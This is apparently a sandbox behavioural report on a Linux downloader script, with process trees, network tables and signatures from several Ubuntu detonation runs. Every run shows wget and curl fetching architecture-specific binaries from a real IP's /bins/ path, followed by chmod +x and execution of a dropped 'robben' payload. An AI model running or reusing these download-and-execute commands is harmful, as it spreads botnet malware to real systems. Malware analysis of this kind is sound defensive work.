[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 91.189.91.49:80 | connectivity-check.ubuntu.com | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 91.189.91.48:80 | connectivity-check.ubuntu.com | tcp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-08-22 21:53
Reported
2024-08-23 00:57
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
95s
Max time network
387s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-timedated.service-C6yiE2 systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-timedated.service-C6yiE2 systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-08-22 21:53
Reported
2024-08-23 00:57
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
92s
Max time network
590s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-timedated.service-sYHQTy systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
